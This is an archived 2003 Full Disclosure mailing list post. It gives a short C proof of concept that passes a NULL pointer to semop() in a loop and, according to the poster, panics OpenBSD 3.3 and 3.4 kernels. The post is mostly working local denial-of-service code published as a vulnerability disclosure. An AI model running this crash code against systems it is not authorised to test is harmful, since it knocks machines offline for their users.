Full Disclosure mailing list archives
yet another panic() in OpenBSD
From: noir () uberhax0r net
Date: Fri, 21 Nov 2003 17:43:33 -0500 (EST)
a project lacking the basic QA and unit testing and here is the outcome:
#include <stdio.h>
#include <sys/types.h>
#include <sys/sem.h>
#include <sys/ipc.h>
int
main()
{
int i;
for(i = 0; i < 0x40; i++)
semop(i, (struct sembuf *) NULL, 0);
}
PANIC in OpenBSD 3.3 and 3.4 is confirmed.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- yet another panic() in OpenBSD noir (Nov 21)
- Re: yet another panic() in OpenBSD Henning Brauer (Nov 22)
- Re: yet another panic() in OpenBSD noir (Nov 24)
- Re: yet another panic() in OpenBSD Henning Brauer (Nov 22)
